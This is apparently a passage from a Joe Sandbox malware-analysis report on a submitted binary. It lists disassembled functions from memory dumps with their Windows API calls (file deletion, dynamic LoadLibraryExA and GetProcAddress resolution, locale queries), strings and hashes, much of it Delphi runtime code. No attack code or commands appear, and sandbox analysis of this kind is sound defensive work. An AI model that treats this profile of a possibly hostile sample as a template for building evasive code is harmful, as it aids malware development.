                                  • Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd
                                  Similarity
                                  • API ID: Path$DeleteFileInitNameName_StringUnicode
                                  • String ID:
                                  • API String ID: 1459852867-0
                                  • Opcode ID: 93f7b2b271e909228215617636db08154a507f3ac1fed8e051c3ce5cdb52e653
                                  • Instruction ID: a9a903bb0f9ee4e2a19e252f9c822f1b4bdd78dd0bd3d8a9a6692ce4fd2ae048
                                  • Opcode Fuzzy Hash: 93f7b2b271e909228215617636db08154a507f3ac1fed8e051c3ce5cdb52e653
                                  • Instruction Fuzzy Hash: FE016275A84208AEEB05FBB08D51FCD77B9EB45704F519492E288F60C1DB74AB048B25
                                  APIs
                                    • Part of subcall function 02E74F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02E74F2E
                                  • RtlInitUnicodeString.NTDLL(?,?), ref: 02E8DC28
                                  • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02E8DC7A), ref: 02E8DC3E
                                  • NtDeleteFile.NTDLL(?), ref: 02E8DC5D
                                    • Part of subcall function 02E74C60: SysFreeString.OLEAUT32(02E8F4A0), ref: 02E74C6E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
                                  • Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd
                                  Similarity
                                  • API ID: String$Path$AllocDeleteFileFreeInitNameName_Unicode
                                  • String ID:
                                  • API String ID: 1694942484-0
                                  • Opcode ID: 23fd692a4964962fd6d126341255eab7de5342f03aa90912e77bacc770d38716
                                  • Instruction ID: 9ad67640dec3b21707a0ca17dd53dc194b87e55f8c73d1fd3b2c13eba2af229c
                                  • Opcode Fuzzy Hash: 23fd692a4964962fd6d126341255eab7de5342f03aa90912e77bacc770d38716
                                  • Instruction Fuzzy Hash: D8012C75980208AAEB11EBB0DD52FCDB3BDEB48700F5094A1F608F21C0EA74AB049A64
                                  APIs
                                  • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02E77FFD
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
                                  • Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd
                                  Similarity
                                  • API ID: DiskFreeSpace
                                  • String ID:
                                  • API String ID: 1705453755-0
                                  • Opcode ID: 0e84e63113b203bdbb6f4b36e313bd68e2bb40eb0524b8026cc147f5c42d23d8
                                  • Instruction ID: 6d17c1e336b220359856ac189eccc39e3490548cb0a17463f6e1f184b7aeedf2
                                  • Opcode Fuzzy Hash: 0e84e63113b203bdbb6f4b36e313bd68e2bb40eb0524b8026cc147f5c42d23d8
                                  • Instruction Fuzzy Hash: D411DEB5E00209AF9B04CF99CD81DAFF7F9EFC9304B54C569A509E7254E671AA018BA0
                                  APIs
                                  • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02E7A7EA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
                                  • Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd
                                  Similarity
                                  • API ID: InfoLocale
                                  • String ID:
                                  • API String ID: 2299586839-0
                                  • Opcode ID: a15f837c0724dd010505429d36130d73888ad1183ebc3ca2b4af5b62fc2d48f5
                                  • Instruction ID: f5df54067dedd2683880c7b585ddcd16146a8331711e88fe3561897da231b6ad
                                  • Opcode Fuzzy Hash: a15f837c0724dd010505429d36130d73888ad1183ebc3ca2b4af5b62fc2d48f5
                                  • Instruction Fuzzy Hash: 7EE0D872B4021857D315A558AC84EFB725D9758310F00D27ABD04C73C4EEB09D404BE4
                                  APIs
                                  • GetVersionExA.KERNEL32(?,02E9D106,00000000,02E9D11E), ref: 02E7B7A2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
                                  • Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd
                                  Similarity
                                  • API ID: Version
                                  • String ID:
                                  • API String ID: 1889659487-0
                                  • Opcode ID: 4d8f96c52c7381e8ea906e6af53b49d6f513d1cd28917fcdacd443f96b912eef
                                  • Instruction ID: 05faaf06498215ad2a4bfb24b4b30eb5bb3412b767f528f88a38896f6845aa41
                                  • Opcode Fuzzy Hash: 4d8f96c52c7381e8ea906e6af53b49d6f513d1cd28917fcdacd443f96b912eef
                                  • Instruction Fuzzy Hash: 8AF0A4749843019FD350DF2AD44261577E9FB48714F889D2BE698C7380E7359895CB53
                                  APIs
                                  • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,02E7BE7A,00000000,02E7C093,?,?,00000000,00000000), ref: 02E7A82B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
                                  • Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd
                                  Similarity
                                  • API ID: InfoLocale
                                  • String ID:
                                  • API String ID: 2299586839-0
                                  • Opcode ID: 037d4bc53f8d63c223699879a68f10b0c110be8fc1968dbb48098bc23aaf63a2
                                  • Instruction ID: 9c335bac02b6bba0d372d97a84d2be500cade73aa7ec7f66962b3db37b6b8d0e
                                  • Opcode Fuzzy Hash: 037d4bc53f8d63c223699879a68f10b0c110be8fc1968dbb48098bc23aaf63a2
                                  • Instruction Fuzzy Hash: B6D05EA234D2602AF210515A2D88DBFAADCCAC57A5F40903AF948C6201D2108C07D6B1
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
                                  • Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd
                                  Similarity
                                  • API ID: LocalTime
                                  • String ID:
                                  • API String ID: 481472006-0
                                  • Opcode ID: c4b3f0c93823539839d01daad2c09e6f11a765adec9aabbdebd76e5b504f9237
                                  • Instruction ID: 83e43037315980094935c058db4ead9b2d3de697f127137c0c60c7b0b7ffec0e
                                  • Opcode Fuzzy Hash: c4b3f0c93823539839d01daad2c09e6f11a765adec9aabbdebd76e5b504f9237
                                  • Instruction Fuzzy Hash: 52A01280444C2041854033180C0253430445810A20FC4C74078F8402D4E91D01248093
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
                                  • Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                  • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                                  • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                  • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
                                  • Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f550b5cbd48fd42d90533e24f01e6b600dca25908298db9d983e397911bd6d31
                                  • Instruction ID: 1e220376207e918058333775ec4273fea7b4f53c05172e42433df3695f24b8af
                                  • Opcode Fuzzy Hash: f550b5cbd48fd42d90533e24f01e6b600dca25908298db9d983e397911bd6d31
                                  • Instruction Fuzzy Hash:
                                  APIs
                                  • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 02E7D2A5
                                    • Part of subcall function 02E7D270: GetProcAddress.KERNEL32(00000000), ref: 02E7D289
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
                                  • Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd
                                  Similarity
                                  • API ID: AddressHandleModuleProc
                                  • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                  • API String ID: 1646373207-1918263038
                                  • Opcode ID: ac6ecfc40d07811d372464b450204f4c0aa55f2e5caf9b1849be21b9fe641697
                                  • Instruction ID: f00f5edd9c7eaf11ae65b87e53b260e67a4c83836fc7126dae1bc2664bfd0b23
                                  • Opcode Fuzzy Hash: ac6ecfc40d07811d372464b450204f4c0aa55f2e5caf9b1849be21b9fe641697
                                  • Instruction Fuzzy Hash: F6412DE1AC42445B66546B6E7D02427B7EADF847307B0F01AB60CDA254EB30ACD6CB2D
                                  APIs
                                  • GetProcAddress.KERNEL32(?,CoCreateInstanceEx), ref: 02E86EF7
                                  • GetProcAddress.KERNEL32(?,CoInitializeEx), ref: 02E86F07
                                  • GetProcAddress.KERNEL32(?,CoAddRefServerProcess), ref: 02E86F17
                                  • GetProcAddress.KERNEL32(?,CoReleaseServerProcess), ref: 02E86F27
                                  • GetProcAddress.KERNEL32(?,CoResumeClassObjects), ref: 02E86F37
                                  • GetProcAddress.KERNEL32(?,CoSuspendClassObjects), ref: 02E86F47
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
                                  • Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd
                                  Similarity
                                  • API ID: AddressProc
                                  • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects
                                  • API String ID: 190572456-772721778
                                  • Opcode ID: 9313acccea5c7261ea2a166798ce32a92c0f1bdc21d858e8be3ebd30955ec574
                                  • Instruction ID: d7da4d67f7f09963631bf6ad50cc83bcd33da71ae0b17e5c174302310bbc5710
                                  • Opcode Fuzzy Hash: 9313acccea5c7261ea2a166798ce32a92c0f1bdc21d858e8be3ebd30955ec574
                                  • Instruction Fuzzy Hash: 7AF0ACF09C87807DFB00FFB35C81926376EAA10718388BC5BBD4A69552E6B5A4948F11
                                  APIs
                                  • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 02E728CE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
                                  • Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd
                                  Similarity
                                  • API ID: Message
                                  • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                  • API String ID: 2030045667-32948583
                                  • Opcode ID: 62c90d9ab9616c2b1cf15a9ea45da7d0d10fb271ffe3c48fa067ce7a4065b89c
                                  • Instruction ID: 7401086d4311bc1e99f0f4b338abb7a5b7f11a1b077cdd2a14d6691ca63a59aa
                                  • Opcode Fuzzy Hash: 62c90d9ab9616c2b1cf15a9ea45da7d0d10fb271ffe3c48fa067ce7a4065b89c
                                  • Instruction Fuzzy Hash: C4A1D430E842548BDF21AA2CCC80BD9B7E5EB09354F14A0E5EE49AB386CB7599C5CF51
                                  Strings
                                  • An unexpected memory leak has occurred. , xrefs: 02E72690
                                  • The sizes of unexpected leaked medium and large blocks are: , xrefs: 02E72849
                                  • Unexpected Memory Leak, xrefs: 02E728C0
                                  • , xrefs: 02E72814
                                  • The unexpected small block leaks are:, xrefs: 02E72707
                                  • 7, xrefs: 02E726A1
                                  • bytes: , xrefs: 02E7275D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
                                  • Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                  • API String ID: 0-2723507874
                                  • Opcode ID: 7b117da8615aad5d51d70e23bc19ec261dcabb5f4cbf8cc65747e5349ae0129a
                                  • Instruction ID: d45723a9c9e2a583b332892a793cd8a5386de687f53c2fb42de8e0a8c6545d5c
                                  • Opcode Fuzzy Hash: 7b117da8615aad5d51d70e23bc19ec261dcabb5f4cbf8cc65747e5349ae0129a
                                  • Instruction Fuzzy Hash: 1F71B330E842988FDF21DA2CCC84BD9BBF5EB09704F14A0E5EA499B281DB754AC5CF51
                                  APIs
                                  • GetThreadLocale.KERNEL32(00000000,02E7C093,?,?,00000000,00000000), ref: 02E7BDFE
                                    • Part of subcall function 02E7A7CC: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02E7A7EA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
                                  • Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd
                                  Similarity
                                  • API ID: Locale$InfoThread
                                  • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                  • API String ID: 4232894706-2493093252
                                  • Opcode ID: 053c361c303b7ff617c751e6c2280f83bb843f7068cd297e05ff7569c0f000e2
                                  • Instruction ID: 47ab6e7780c40989efe3d10f130b92a4dcd8bd66ec561166abcd566f52ce98e9
                                  • Opcode Fuzzy Hash: 053c361c303b7ff617c751e6c2280f83bb843f7068cd297e05ff7569c0f000e2
                                  • Instruction Fuzzy Hash: 0B611F34BC02889BDB04EBA4D851A9F77BBDB89300F60F839F201AB745DA35D9459F91
                                  APIs
                                  • IsBadReadPtr.KERNEL32(?,00000004), ref: 02E8AFFC
                                  • GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 02E8B013
                                  • IsBadReadPtr.KERNEL32(?,00000004), ref: 02E8B0A7
                                  • IsBadReadPtr.KERNEL32(?,00000002), ref: 02E8B0B3
                                  • IsBadReadPtr.KERNEL32(?,00000014), ref: 02E8B0C7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
                                  • Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd
                                  Similarity
                                  • API ID: Read$HandleModule
                                  • String ID: KernelBase$LoadLibraryExA
                                  • API String ID: 2226866862-113032527
                                  • Opcode ID: d82ddc0f380bacd9279c3f82a3de515422d287bbc67b6a47008cb196a7f64b08
                                  • Instruction ID: c57c8563f928d6312de242a664654cb0566582665ee013eafb4ec51f0fc7ebc2
                                  • Opcode Fuzzy Hash: d82ddc0f380bacd9279c3f82a3de515422d287bbc67b6a47008cb196a7f64b08
                                  • Instruction Fuzzy Hash: 9D312F71680605FBDB20EBA9CC85F5A77A8AF0435CF40D514FAACEB2C1D370A954CB55
                                  APIs
                                  • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02E74423,?,?,02EF67C8,?,?,02E9E7A8,02E765B1,02E9D30D), ref: 02E74395
                                  • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02E74423,?,?,02EF67C8,?,?,02E9E7A8,02E765B1,02E9D30D), ref: 02E7439B
                                  • GetStdHandle.KERNEL32(000000F5,02E743E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02E74423,?,?,02EF67C8), ref: 02E743B0
                                  • WriteFile.KERNEL32(00000000,000000F5,02E743E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02E74423,?,?), ref: 02E743B6
                                  • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 02E743D4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
                                  • Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd
                                  Similarity
                                  • API ID: FileHandleWrite$Message
                                  • String ID: Error$Runtime error at 00000000
                                  • API String ID: 1570097196-2970929446
                                  • Opcode ID: a497ed19508d3f0632d96c4bce453794114ae2fefa66cad17e1f0ee661156dad
                                  • Instruction ID: 6b6bf78d61f7fc8cabc783aa0d21eb8acbade1d9528ded09f8c4f565d13503ed
                                  • Opcode Fuzzy Hash: a497ed19508d3f0632d96c4bce453794114ae2fefa66cad17e1f0ee661156dad
                                  • Instruction Fuzzy Hash: 8CF0B460AC434475FB10F3A07C46F5E276C4785F25F54EA17B32C9C0C08BA440C48B32
                                  APIs
                                    • Part of subcall function 02E7AD44: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02E7AD61
                                    • Part of subcall function 02E7AD44: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02E7AD85
                                    • Part of subcall function 02E7AD44: GetModuleFileNameA.KERNEL32(02E70000,?,00000105), ref: 02E7ADA0
                                    • Part of subcall function 02E7AD44: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02E7AE36
                                  • CharToOemA.USER32(?,?), ref: 02E7AF03
                                  • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 02E7AF20
                                  • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02E7AF26
                                  • GetStdHandle.KERNEL32(000000F4,02E7AF90,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02E7AF3B
                                  • WriteFile.KERNEL32(00000000,000000F4,02E7AF90,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02E7AF41
                                  • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 02E7AF63
                                  • MessageBoxA.USER32(00000000,?,?,00002010), ref: 02E7AF79
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
                                  • Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd
                                  Similarity
                                  • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                  • String ID:
                                  • API String ID: 185507032-0
                                  • Opcode ID: 535bfaab7c94115b1b62ea48a552cce3b1c07fdb699cbfecbe8f0afce8e96bad
                                  • Instruction ID: d35361a61c5a0fb295a8346d7128b4d4d921724dc1d38086d5079f4f5933b19b
                                  • Opcode Fuzzy Hash: 535bfaab7c94115b1b62ea48a552cce3b1c07fdb699cbfecbe8f0afce8e96bad
                                  • Instruction Fuzzy Hash: D7115EB25D4300AFE200FBA5CC85F9F77AEAB45704F809929BB54D61E0DB74E9448F62
                                  APIs
                                  • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02E7E62D
